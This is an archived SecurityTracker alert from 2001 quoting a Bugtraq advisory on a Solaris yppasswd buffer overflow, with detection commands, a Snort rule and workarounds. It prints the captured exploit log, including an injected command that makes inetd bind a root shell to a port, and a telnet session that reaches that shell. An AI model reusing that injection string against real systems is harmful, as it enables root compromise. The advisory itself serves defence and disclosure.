Yppasswd on Sun Solaris Gives Remote Users Root-Level Access on the Server
|
|
SecurityTracker Alert ID: 1001631 |
|
SecurityTracker URL: http://securitytracker.com/id/1001631
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: May 29 2001
|
Impact:
Execution of arbitrary code via network, Root access via network
|
|
Version(s): Solaris 6, 7 (SPARC tested, x86 unknown)
|
Description:
It is reported that the yppasswd service on Sun Solaris contains a vulnerability that allows a remote user to obtain root-level access on the server.
It is reported that a buffer overflow exists in the yppasswd on certain version of Sun Solaris. A working exploit has been circulating (but is not included in this reports).
It is reported that users can check a system for the vulnerability using "rpcinfo -p | grep 100009" or "ps -ef | grep yppassword". If either of these commands return some information, then the system is reportedly vulnerable to the exploit.
Some additional information about the symptoms of a successful exploit are provided in the Source Message.
|
Impact:
A remote user can obtain root-level access on the server.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.sun.com/ (Links to External Site)
|
Cause:
Boundary error
|
Underlying OS:
UNIX (Solaris - SunOS)
|
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Mon, 28 May 2001 14:14:23 -0400 (EDT)
Subject: solaris 2.6, 7 yppasswd vulnerability
|
--377562320-744030613-991073663=:28508
Content-Type: TEXT/PLAIN; charset=US-ASCII
aleph,
please pass this on to bugtraq. this is *not* a crimelabs find, only some
information i haven't yet seen on bugtraq. this is culled from the
writeups by myself and matt fearnow (and is available on the incidents.org
website http://www.incidents.org/news/yppassword.php).
thanks.
____________________________
jose nazario jose@cwru.edu
PGP: 89 B0 81 DA 5B FD 7E 00 99 C3 B2 CD 48 A0 07 80
PGP key ID 0xFD37F4E5 (pgp.mit.edu)
Vulnerability Report
Vulnerability: Buffer overflow in yppasswd service
Affects: Solaris 6, 7 (SPARC tested, x86 unknown)
Exploit: In circulation (http://www.hack.co.za/)
Vendor Patch: Not yet.
Various people have contacted Sun about this. No
official word yet.
Workarounds supplied (included).
Credits: 'metaray'
Acknowledgements: Hackernews for heads up
Stephen Lee <lee@mailhost.sju.edu>
Melanie Humphrey <melanie@mathcs.sjsu.edu>
Neil Long <neil.long@computing-services.oxford.ac.uk>
Matt Fearnow (SANS)
Description
Please note that this is a preliminary characterization of the Solaris
yppassword buffer overflow. This version is available to provide at least
some information about it. Please check back over the next few days as the
information is made more complete.
A buffer overflow exploit (for the SPARC architecture) has been found in
the wild which takes advantage of an unchecked buffer in the 'yppasswd'
service on Solaris 2.6, 7 machines. The Intel/x86 version of Solaris 2.6
and 7 may be vulnerable but has not yet been tested.
To check your system for vulnerability, use "rpcinfo -p | grep 100009" or
you can use "ps -ef | grep yppassword". If you see something, your system
is vulnerable to this exploit.
Exploit log message:
May 9 13:56:56 victim-system yppasswdd[191]: yppasswdd: user
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@L
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@P"
`"?-"?-"?-"? ; /bin/sh-c echo 'rje stream tcp nowait root /bin/sh sh
-i'>z;/usr/sbin/inetd -s z;rm z;: does not exist
Symptoms: two inetds running:
victim-system:# ps -ef | grep inetd
root 209 1 0 Apr 30 ? 0:18 /usr/sbin/inetd -s -t
root 8297 1 0 13:56:56 ? 0:00 /usr/sbin/inetd -s z
Effect: root shell on port 77/TCP
she-ra:$ telnet victim-system rje
Trying 192.168.10.5...
Connected to victim-system.example.com.
Escape character is '^]'.
#
Detection
While running the code against a "non vulnerable" Solaris system,
Snort picks up the following:
May 10 20:52:33 macew snort[30824]: IDS19/portmap-request-amountd:
192.168.4.38:654 -> 192.168.12.30:111
May 10 20:52:33 macew snort[30824]: IDS19/portmap-request-amountd:
192.168.4.38:654 -> 192.168.12.30:111
May 10 20:52:33 macew snort[30824]: IDS19/portmap-request-amountd:
192.168.4.38:654 -> 192.168.12.30:111
The following is the snort rule from whitehats, that picked this up:
alert UDP $EXTERNAL any -> $INTERNAL 111 (msg:
"IDS19/portmap-request-autofsd"; rpc: 10099,*,*;)
Protection
The best solution is to firewall your boxe(s) that are running NIS from
the internet. However this will not stop the insider attack.
Sun has not release an official patch for this yet. A workaround 1) would
be to turn off yppasswdd. This is around line 133 or so in
/usr/lib/netsvc/yp/ypstart. Just comment it out. The hack doesn't appear
to work if yppassword is disabled with NIS still running. Please note in
doing this, yppassword is not running and users cannot change their
password.
Another work around 2) is if you still need to run yppassword is to do
the following:
set noexec_user_stack = 1
set noexec_user_stack_log = 1
in /etc/system (after a reboot of course)
Of course a different exploit could work around that but hopefully this
will permit people to use yppasswd until a patch is forthcoming. This step
has not been tested yet.
References
Further information can be found at:
* http://www.incidents.org
* http://www.sans.org/infosecFAQ/unix/NIS.htm, Security Issues in NIS
* http://www.sans.org/infosecFAQ/unix/sec_solaris.htm Securing Solaris
Credits
This security advisory was prepared by Matt Fearnow of the SANS Institute
and Jose Nazario.
Also contributing efforts go to Melanie Humphrey for the 1) workaround and
Neil Long for the 2) workaround and to Stephen Lee. Acknowledgements:
Hackernews for heads up, and 'metaray' for discovering this vulnerability.
--377562320-744030613-991073663=:28508
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="yppasswd.txt"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.30.0105281414230.28508@biocserver.BIOC.CWRU.Edu>
Content-Description:
Content-Disposition: attachment; filename="yppasswd.txt"
ICAgICAgICAgICAgICAgICAgICAgICAgVnVsbmVyYWJpbGl0eSBSZXBvcnQN
Cg0KICAgICAgICBWdWxuZXJhYmlsaXR5OiBCdWZmZXIgb3ZlcmZsb3cgaW4g
eXBwYXNzd2Qgc2VydmljZQ0KICAgICAgICAgICAgICBBZmZlY3RzOiBTb2xh
cmlzIDYsIDcgKFNQQVJDIHRlc3RlZCwgeDg2IHVua25vd24pDQogICAgICAg
ICAgICAgIEV4cGxvaXQ6IEluIGNpcmN1bGF0aW9uIChodHRwOi8vd3d3Lmhh
Y2suY28uemEvKQ0KICAgICAgICAgVmVuZG9yIFBhdGNoOiBOb3QgeWV0Lg0K
ICAgICAgICAgICAgICAgICAgICAgICBWYXJpb3VzIHBlb3BsZSBoYXZlIGNv
bnRhY3RlZCBTdW4gYWJvdXQgdGhpcy4gTm8NCiAgICAgICAgICAgICAgICAg
ICAgICAgb2ZmaWNpYWwgd29yZCB5ZXQuDQogICAgICAgICAgICAgICAgICAg
ICAgIFdvcmthcm91bmRzIHN1cHBsaWVkIChpbmNsdWRlZCkuDQogICAgICAg
ICAgICAgIENyZWRpdHM6ICdtZXRhcmF5Jw0KICAgICBBY2tub3dsZWRnZW1l
bnRzOiBIYWNrZXJuZXdzIGZvciBoZWFkcyB1cA0KICAgICAgICAgICAgICAg
ICAgICAgICBTdGVwaGVuIExlZSA8bGVlQG1haWxob3N0LnNqdS5lZHU+DQog
ICAgICAgICAgICAgICAgICAgICAgIE1lbGFuaWUgSHVtcGhyZXkgPG1lbGFu
aWVAbWF0aGNzLnNqc3UuZWR1Pg0KCQkgICAgICAgTmVpbCBMb25nIDxuZWls
LmxvbmdAY29tcHV0aW5nLXNlcnZpY2VzLm94Zm9yZC5hYy51az4NCgkJICAg
ICAgIE1hdHQgRmVhcm5vdyAoU0FOUykNCg0KRGVzY3JpcHRpb24NCg0KUGxl
YXNlIG5vdGUgdGhhdCB0aGlzIGlzIGEgcHJlbGltaW5hcnkgY2hhcmFjdGVy
aXphdGlvbiBvZiB0aGUgU29sYXJpcw0KeXBwYXNzd29yZCBidWZmZXIgb3Zl
cmZsb3cuIFRoaXMgdmVyc2lvbiBpcyBhdmFpbGFibGUgdG8gcHJvdmlkZSBh
dCBsZWFzdA0Kc29tZSBpbmZvcm1hdGlvbiBhYm91dCBpdC4gUGxlYXNlIGNo
ZWNrIGJhY2sgb3ZlciB0aGUgbmV4dCBmZXcgZGF5cyBhcyB0aGUNCmluZm9y
bWF0aW9uIGlzIG1hZGUgbW9yZSBjb21wbGV0ZS4NCg0KQSBidWZmZXIgb3Zl
cmZsb3cgZXhwbG9pdCAoZm9yIHRoZSBTUEFSQyBhcmNoaXRlY3R1cmUpIGhh
cyBiZWVuIGZvdW5kIGluDQp0aGUgd2lsZCB3aGljaCB0YWtlcyBhZHZhbnRh
Z2Ugb2YgYW4gdW5jaGVja2VkIGJ1ZmZlciBpbiB0aGUgJ3lwcGFzc3dkJw0K
c2VydmljZSBvbiBTb2xhcmlzIDIuNiwgNyBtYWNoaW5lcy4gVGhlIEludGVs
L3g4NiB2ZXJzaW9uIG9mIFNvbGFyaXMgMi42DQphbmQgNyBtYXkgYmUgdnVs
bmVyYWJsZSBidXQgaGFzIG5vdCB5ZXQgYmVlbiB0ZXN0ZWQuDQoNClRvIGNo
ZWNrIHlvdXIgc3lzdGVtIGZvciB2dWxuZXJhYmlsaXR5LCB1c2UgInJwY2lu
Zm8gLXAgfCBncmVwIDEwMDAwOSIgb3INCnlvdSBjYW4gdXNlICJwcyAtZWYg
fCBncmVwIHlwcGFzc3dvcmQiLiBJZiB5b3Ugc2VlIHNvbWV0aGluZywgeW91
ciBzeXN0ZW0NCmlzIHZ1bG5lcmFibGUgdG8gdGhpcyBleHBsb2l0Lg0KDQpF
eHBsb2l0IGxvZyBtZXNzYWdlOg0KDQpNYXkgIDkgMTM6NTY6NTYgdmljdGlt
LXN5c3RlbSB5cHBhc3N3ZGRbMTkxXTogeXBwYXNzd2RkOiB1c2VyDQpAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEwNCkBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQA0K
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA
DQpAQEBAQEBAQEBAQEBAQEBAQFAiDQpgIj8tIj8tIj8tIj8gOyAvYmluL3No
LWMgZWNobyAncmplIHN0cmVhbSB0Y3Agbm93YWl0IHJvb3QgL2Jpbi9zaCBz
aA0KLWknPno7L3Vzci9zYmluL2luZXRkIC1zIHo7cm0gejs6IGRvZXMgbm90
IGV4aXN0DQoNCg0KU3ltcHRvbXM6IHR3byBpbmV0ZHMgcnVubmluZzoNCg0K
dmljdGltLXN5c3RlbTojIHBzIC1lZiB8IGdyZXAgaW5ldGQNCnJvb3QgICAy
MDkgICAgIDEgIDAgICBBcHIgMzAgPyAgICAgICAgMDoxOCAvdXNyL3NiaW4v
aW5ldGQgLXMgLXQNCnJvb3QgIDgyOTcgICAgIDEgIDAgMTM6NTY6NTYgPyAg
ICAgICAgMDowMCAvdXNyL3NiaW4vaW5ldGQgLXMgeg0KDQoNCkVmZmVjdDog
cm9vdCBzaGVsbCBvbiBwb3J0IDc3L1RDUA0KDQpzaGUtcmE6JCB0ZWxuZXQg
dmljdGltLXN5c3RlbSByamUNClRyeWluZyAxOTIuMTY4LjEwLjUuLi4NCkNv
bm5lY3RlZCB0byB2aWN0aW0tc3lzdGVtLmV4YW1wbGUuY29tLg0KRXNjYXBl
IGNoYXJhY3RlciBpcyAnXl0nLg0KIw0KDQpEZXRlY3Rpb24NCg0KV2hpbGUg
cnVubmluZyB0aGUgY29kZSBhZ2FpbnN0IGEgIm5vbiB2dWxuZXJhYmxlIiBT
b2xhcmlzIHN5c3RlbSwNClNub3J0IHBpY2tzIHVwIHRoZSBmb2xsb3dpbmc6
DQoNCk1heSAxMCAyMDo1MjozMyBtYWNldyBzbm9ydFszMDgyNF06IElEUzE5
L3BvcnRtYXAtcmVxdWVzdC1hbW91bnRkOg0KMTkyLjE2OC40LjM4OjY1NCAt
PiAxOTIuMTY4LjEyLjMwOjExMQ0KDQpNYXkgMTAgMjA6NTI6MzMgbWFjZXcg
c25vcnRbMzA4MjRdOiBJRFMxOS9wb3J0bWFwLXJlcXVlc3QtYW1vdW50ZDoN
CjE5Mi4xNjguNC4zODo2NTQgLT4gMTkyLjE2OC4xMi4zMDoxMTENCg0KTWF5
IDEwIDIwOjUyOjMzIG1hY2V3IHNub3J0WzMwODI0XTogSURTMTkvcG9ydG1h
cC1yZXF1ZXN0LWFtb3VudGQ6DQoxOTIuMTY4LjQuMzg6NjU0IC0+IDE5Mi4x
NjguMTIuMzA6MTExDQoNClRoZSBmb2xsb3dpbmcgaXMgdGhlIHNub3J0IHJ1
bGUgZnJvbSB3aGl0ZWhhdHMsIHRoYXQgcGlja2VkIHRoaXMgdXA6DQoNCmFs
ZXJ0IFVEUCAkRVhURVJOQUwgYW55IC0+ICRJTlRFUk5BTCAxMTEgKG1zZzog
DQoiSURTMTkvcG9ydG1hcC1yZXF1ZXN0LWF1dG9mc2QiOyBycGM6IDEwMDk5
LCosKjspDQoNClByb3RlY3Rpb24NCg0KVGhlIGJlc3Qgc29sdXRpb24gaXMg
dG8gZmlyZXdhbGwgeW91ciBib3hlKHMpIHRoYXQgYXJlIHJ1bm5pbmcgTklT
IGZyb20NCnRoZSBpbnRlcm5ldC4gSG93ZXZlciB0aGlzIHdpbGwgbm90IHN0
b3AgdGhlIGluc2lkZXIgYXR0YWNrLg0KDQpTdW4gaGFzIG5vdCByZWxlYXNl
IGFuIG9mZmljaWFsIHBhdGNoIGZvciB0aGlzIHlldC4gQSB3b3JrYXJvdW5k
IDEpIHdvdWxkDQpiZSB0byB0dXJuIG9mZiB5cHBhc3N3ZGQuIFRoaXMgaXMg
YXJvdW5kIGxpbmUgMTMzIG9yIHNvIGluDQovdXNyL2xpYi9uZXRzdmMveXAv
eXBzdGFydC4gSnVzdCBjb21tZW50IGl0IG91dC4gVGhlIGhhY2sgZG9lc24n
dCBhcHBlYXINCnRvIHdvcmsgaWYgeXBwYXNzd29yZCBpcyBkaXNhYmxlZCB3
aXRoIE5JUyBzdGlsbCBydW5uaW5nLiBQbGVhc2Ugbm90ZSBpbg0KZG9pbmcg
dGhpcywgeXBwYXNzd29yZCBpcyBub3QgcnVubmluZyBhbmQgdXNlcnMgY2Fu
bm90IGNoYW5nZSB0aGVpcg0KcGFzc3dvcmQuDQoNCkFub3RoZXIgd29yayBh
cm91bmQgMikgaXMgaWYgeW91IHN0aWxsIG5lZWQgdG8gcnVuIHlwcGFzc3dv
cmQgaXMgdG8gZG8NCnRoZSBmb2xsb3dpbmc6DQoNCnNldCBub2V4ZWNfdXNl
cl9zdGFjayA9IDENCnNldCBub2V4ZWNfdXNlcl9zdGFja19sb2cgPSAxDQpp
biAvZXRjL3N5c3RlbSAoYWZ0ZXIgYSByZWJvb3Qgb2YgY291cnNlKQ0KDQpP
ZiBjb3Vyc2UgYSBkaWZmZXJlbnQgZXhwbG9pdCBjb3VsZCB3b3JrIGFyb3Vu
ZCB0aGF0IGJ1dCBob3BlZnVsbHkgdGhpcw0Kd2lsbCBwZXJtaXQgcGVvcGxl
IHRvIHVzZSB5cHBhc3N3ZCB1bnRpbCBhIHBhdGNoIGlzIGZvcnRoY29taW5n
LiBUaGlzIHN0ZXANCmhhcyBub3QgYmVlbiB0ZXN0ZWQgeWV0Lg0KDQpSZWZl
cmVuY2VzDQoNCkZ1cnRoZXIgaW5mb3JtYXRpb24gY2FuIGJlIGZvdW5kIGF0
Og0KKiBodHRwOi8vd3d3LmluY2lkZW50cy5vcmcNCiogaHR0cDovL3d3dy5z
YW5zLm9yZy9pbmZvc2VjRkFRL3VuaXgvTklTLmh0bSwgU2VjdXJpdHkgSXNz
dWVzIGluIE5JUw0KKiBodHRwOi8vd3d3LnNhbnMub3JnL2luZm9zZWNGQVEv
dW5peC9zZWNfc29sYXJpcy5odG0gU2VjdXJpbmcgU29sYXJpcw0KDQpDcmVk
aXRzDQoNClRoaXMgc2VjdXJpdHkgYWR2aXNvcnkgd2FzIHByZXBhcmVkIGJ5
IE1hdHQgRmVhcm5vdyBvZiB0aGUgU0FOUyBJbnN0aXR1dGUNCmFuZCBKb3Nl
IE5hemFyaW8uDQoNCkFsc28gY29udHJpYnV0aW5nIGVmZm9ydHMgZ28gdG8g
TWVsYW5pZSBIdW1waHJleSBmb3IgdGhlIDEpIHdvcmthcm91bmQgYW5kDQpO
ZWlsIExvbmcgZm9yIHRoZSAyKSB3b3JrYXJvdW5kIGFuZCB0byBTdGVwaGVu
IExlZS4gQWNrbm93bGVkZ2VtZW50czoNCkhhY2tlcm5ld3MgZm9yIGhlYWRz
IHVwLCBhbmQgJ21ldGFyYXknIGZvciBkaXNjb3ZlcmluZyB0aGlzIHZ1bG5l
cmFiaWxpdHkuDQoNCg==
--377562320-744030613-991073663=:28508--
|
|
